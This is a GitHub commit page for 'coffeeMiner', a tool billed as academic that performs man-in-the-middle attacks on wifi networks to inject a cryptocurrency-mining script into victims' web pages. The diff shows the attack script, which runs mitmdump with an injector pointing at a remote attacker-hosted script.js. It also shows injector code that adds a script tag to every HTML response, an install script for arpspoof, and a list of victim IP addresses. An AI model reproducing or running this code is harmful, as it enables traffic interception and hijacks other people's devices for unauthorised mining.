Skip to content

Commit

Permalink
readme updated, removed comments
Browse files Browse the repository at this point in the history
  • Loading branch information
arnaucube committed Jan 4, 2018
1 parent e586ddb commit 7a9270e
Show file tree
Hide file tree
Showing 9 changed files with 15 additions and 22 deletions.
11 changes: 9 additions & 2 deletions README.md
Expand Up @@ -4,6 +4,9 @@ Collaborative (mitm) cryptocurrency mining pool in wifi networks

**Warning: this project is for academic/research purposes only.**

A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

![coffeeMiner](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-logo-small.png "coffeeMiner")

## Concept
- Performs a MITM attack to all selected victims
Expand All @@ -22,12 +25,16 @@ bash install.sh
```py
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
```
- run.py
- execute coffeeMiner.py
```
python3 coffeeMiner.py ipgateway
```

![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network")
![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-network-attack.png "network")


A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md



![demo](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-demo-cutted.gif "demo")
Binary file added coffeeMiner-demo-cutted.gif
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added coffeeMiner-logo-small.png
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added coffeeMiner-network-attack.png
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
2 changes: 1 addition & 1 deletion coffeeMiner.py
Expand Up @@ -25,7 +25,7 @@
os.system("xterm -hold -e 'python3 httpServer.py' &")

# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")


'''
Expand Down
15 changes: 0 additions & 15 deletions injector.py
Expand Up @@ -5,29 +5,16 @@
import argparse

class Injector:
'''
def load(self, loader):
loader.add_option(
"scr_url", str, "", "script_url to inject"
)
'''
def __init__(self, path):
self.path = path

def response(self, flow: http.HTTPFlow) -> None:
#print("hola hola hola")
#print(self.path)

if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
print("uuuuuu")
print(flow.response.headers["content-type"])
print("asdf asdf asdf asdf asdf")
print("-----")
print("mmmmm")
script = html.new_tag(
"script",
src=self.path,
Expand All @@ -41,5 +28,3 @@ def start():
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)

#addons = [Injector()]
2 changes: 0 additions & 2 deletions install.sh
@@ -1,5 +1,3 @@
#TODO put --yes to all installation commands

# install arpspoof (dsniff)
apt-get -y install dsniff

Expand Down
Binary file removed network.png
Binary file not shown.
7 changes: 5 additions & 2 deletions victims.txt
@@ -1,2 +1,5 @@
192.168.1.30
192.168.1.31
192.168.1.41
192.168.1.35
192.168.1.45
192.168.1.48
192.168.1.38

0 comments on commit 7a9270e

Please sign in to comment.